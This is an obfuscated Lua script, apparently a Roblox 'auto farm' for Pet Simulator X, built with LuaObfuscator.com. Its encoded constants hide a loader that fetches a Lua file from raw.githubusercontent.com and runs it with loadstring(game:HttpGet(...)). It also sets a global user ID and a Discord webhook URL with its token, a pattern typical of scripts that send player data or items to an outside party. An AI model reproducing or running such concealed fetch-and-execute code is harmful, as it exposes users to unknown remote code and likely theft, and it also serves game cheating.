--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v86=0;local v87;while true do if (v86==1) then return v87;end if (v86==0) then v87=v5(v81,v19);v19=nil;v86=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + ((147 + 785) -(857 + 67 + 7)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=2^(v32-(928 -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 -0) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(0 -(0 + 0))) then v35=v1(v16,v18,v18);v18=v18 + (118 -((989 -(892 + 65)) + (202 -117))) ;v34=1271 -(226 + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (354 -(87 + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,53 -33 ) * ((3 -1)^(24 + (30 -22)))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,19 + (455 -(416 + 26)) )==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==((0 -0) -0)) then if (v45==(0 + 0)) then return v47 * 0 ;else v46=1;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 182 + 241))) and (v47 * ((3 -2)/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(91 -39)))) ;end local function v25(v48)local v49=0 + 0 ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==(440 -((529 -384) + (1040 -747)))) then v51={};for v88=1, #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=433 -(44 + 386) ;end if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -((4 -3) + 0) );v18=v18 + v48 ;v49=2 + 0 ;end if (v49==(859 -(814 + 45))) then v50=nil;if  not v48 then v48=v23();if (v48==(772 -((495 -294) + 571))) then return "";end end v49=1139 -(116 + 1022) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1825 -(1195 + 629))) then v55=nil;v56=nil;v52=2 -0 ;end if (v52~=2) then else v57=nil;v58=nil;v52=244 -(187 + 54) ;end if (v52~=(783 -(162 + 618))) then else v59=nil;v60=nil;v52=4;end if (v52~=0) then else v53=0;v54=nil;v52=1;end if (v52==4) then while true do if (v53~=(0 + 0)) then else v54=0 + 0 ;v55=nil;v53=1;end if (2~=v53) then else local v96=0;while true do if (v96~=(1 -0)) then else v53=4 -1 ;break;end if (v96~=0) then else v58=nil;v59=nil;v96=1 + 0 ;end end end if (v53==(1639 -(1373 + 263))) then v60=nil;while true do if (v54==(1001 -(451 + 549))) then v59=v23();v60={};for v102=1 + 0 ,v59 do local v103=0;local v104;local v105;local v106;while true do if (v103==(0 -0)) then local v120=0;while true do if (v120==(1 -0)) then v103=1;break;end if (v120==0) then v104=1384 -(746 + 638) ;v105=nil;v120=1 + 0 ;end end end if (v103~=(1 -0)) then else v106=nil;while true do if (v104~=(342 -(218 + 123))) then else if (v105==1) then v106=v21()~=(1581 -(1535 + 46)) ;elseif (v105==2) then v106=v24();elseif (v105~=(3 + 0)) then else v106=v25();end v60[v102]=v106;break;end if (v104==(0 + 0)) then v105=v21();v106=nil;v104=1;end end break;end end end v58[563 -(306 + 254) ]=v21();v54=2;end if (2==v54) then local v98=0 + 0 ;local v99;while true do if (v98==(0 -0)) then v99=1467 -(899 + 568) ;while true do local v121=0;while true do if ((0 + 0)==v121) then if (v99==1) then return v58;end if (v99~=0) then else local v159=0;while true do if (v159~=(0 -0)) then else for v162=604 -(268 + 335) ,v23() do local v163=0;local v164;local v165;while true do if (v163==0) then local v168=0;while true do if (v168~=(290 -(60 + 230))) then else v164=0;v165=nil;v168=573 -(426 + 146) ;end if (v168==(1 + 0)) then v163=1;break;end end end if ((1457 -(282 + 1174))~=v163) then else while true do if (v164~=0) then else v165=v21();if (v20(v165,812 -(569 + 242) ,2 -1 )~=(0 + 0)) then else local v169=1024 -(706 + 318) ;local v170;local v171;local v172;local v173;while true do if (2~=v169) then else while true do if (v170~=(1253 -(721 + 530))) then else local v177=0;while true do if (v177~=(1271 -(945 + 326))) then else local v186=0 -0 ;while true do if (v186==1) then v177=1 + 0 ;break;end if ((700 -(271 + 429))==v186) then local v187=0;while true do if (v187==(1 + 0)) then v186=1501 -(1408 + 92) ;break;end if (v187~=(1086 -(461 + 625))) then else if (v20(v172,1289 -(993 + 295) ,1)==1) then v173[2]=v60[v173[1 + 1 ]];end if (v20(v172,2,1173 -(418 + 753) )==(1 + 0)) then v173[3]=v60[v173[1 + 2 ]];end v187=1 + 0 ;end end end end end if (v177~=(1 + 0)) then else v170=3;break;end end end if ((532 -(406 + 123))~=v170) then else if (v20(v172,3,3)~=(1770 -(1749 + 20))) then else v173[1 + 3 ]=v60[v173[4]];end v55[v162]=v173;break;end if (v170~=1) then else local v179=0;local v180;local v181;while true do if (v179~=(1323 -(1249 + 73))) then else while true do if (v180==(0 + 0)) then v181=0;while true do if ((1145 -(466 + 679))~=v181) then else local v190=0 -0 ;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191==(0 -0)) then v173={v22(),v22(),nil,nil};if (v171==(0 -0)) then local v196=0 -0 ;local v197;while true do if (v196==0) then v197=114 -(4 + 110) ;while true do if (v197==(584 -(57 + 527))) then v173[1430 -(41 + 1386) ]=v22();v173[107 -(17 + 86) ]=v22();break;end end break;end end elseif (v171==(1 + 0)) then v173[3]=v23();elseif (v171==(3 -1)) then v173[8 -5 ]=v23() -((168 -(122 + 44))^16) ;elseif (v171==(5 -2)) then local v202=0;local v203;local v204;while true do if (v202==(0 -0)) then v203=0;v204=nil;v202=1 + 0 ;end if (v202==(1 + 0)) then while true do if ((0 -0)==v203) then v204=0;while true do if (0~=v204) then else v173[3]=v23() -((67 -(30 + 35))^(11 + 5)) ;v173[4]=v22();break;end end break;end end break;end end end v191=1258 -(1043 + 214) ;end if (1==v191) then v181=3 -2 ;break;end end break;end end end if (v181==(1213 -(323 + 889))) then v170=2;break;end end break;end end break;end if (v179==0) then v180=0;v181=nil;v179=2 -1 ;end end end if (v170~=0) then else local v182=0;local v183;while true do if (v182==(580 -(361 + 219))) then v183=0;while true do if (v183==(321 -(53 + 267))) then v170=1 + 0 ;break;end if (v183~=0) then else local v188=0;local v189;while true do if (v188~=0) then else v189=0;while true do if (v189~=1) then else v183=1;break;end if (v189==0) then v171=v20(v165,2,416 -(15 + 398) );v172=v20(v165,4,988 -(18 + 964) );v189=1;end end break;end end end end break;end end end end break;end if (v169~=(0 -0)) then else local v174=0 + 0 ;local v175;while true do if (v174==0) then v175=0;while true do if (v175==(1 + 0)) then v169=851 -(20 + 830) ;break;end if (v175~=0) then else v170=0 + 0 ;v171=nil;v175=127 -(116 + 10) ;end end break;end end end if (v169==(1 + 0)) then local v176=0;while true do if (1~=v176) then else v169=740 -(542 + 196) ;break;end if (v176==(0 -0)) then v172=nil;v173=nil;v176=1 + 0 ;end end end end end break;end end break;end end end for v166=1 + 0 ,v23() do v56[v166-1 ]=v28();end v159=1 + 0 ;end if (v159~=1) then else v99=1;break;end end end break;end end end break;end end end if (v54==(0 -0)) then local v100=0 -0 ;local v101;while true do if (v100==0) then v101=0;while true do if (v101==0) then local v150=1551 -(1126 + 425) ;while true do if (v150==(405 -(118 + 287))) then v55={};v56={};v150=1;end if (v150==1) then v101=3 -2 ;break;end end end if (v101~=2) then else v54=1122 -(118 + 1003) ;break;end if (v101==1) then local v151=0;while true do if (1~=v151) then else v101=2;break;end if (v151==0) then v57={};v58={v55,v56,nil,v57};v151=1;end end end end break;end end end end break;end if (1~=v53) then else v56=nil;v57=nil;v53=2;end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v85=0;while true do if (v85==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then local v107=v79[2];v77[v107]=v77[v107](v13(v77,v107 + 1 ,v72));elseif (v80>1) then v77[v79[2]]=v63[v79[3]];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=3) then v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80>4) then v71=v79[3];else v77[v79[2]]();end elseif (v80<=8) then if (v80<=6) then local v115=v79[2];local v116=v77[v79[3]];v77[v115 + 1 ]=v116;v77[v115]=v116[v79[4]];elseif (v80==7) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==1) then v72=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v79[2];v127,v128=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v125=1;end if (v125==2) then for v155=v126,v72 do local v156=0;while true do if (v156==0) then v129=v129 + 1 ;v77[v155]=v127[v129];break;end end end break;end end else local v130;local v131,v132;local v133;local v134;v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v133=v77[v79[3]];v77[v134 + 1 ]=v133;v77[v134]=v133[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v131,v132=v70(v77[v134](v13(v77,v134 + 1 ,v79[3])));v72=(v132 + v134) -1 ;v130=0;for v148=v134,v72 do local v149=0;while true do if (v149==0) then v130=v130 + 1 ;v77[v148]=v131[v130];break;end end end v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v77[v134]=v77[v134](v13(v77,v134 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80<=9) then do return;end elseif (v80>10) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end if (0==v85) then v79=v67[v71];v80=v79[1];v85=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944030A3O003334373433372O34363703073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O333031333837362O3437393033382O352F3247512O2D524B506539695879313441704C5778305A6C412O7436394F53676C76716A47685A496339363473677774414244786C34664468796F44654C49777157344E4100143O00120A3O00013O0026013O000B000100020004053O000B0001001202000100033O001208000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026013O0001000100010004053O00010001001202000100073O00300300010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00093O00017O00",v9(),...);
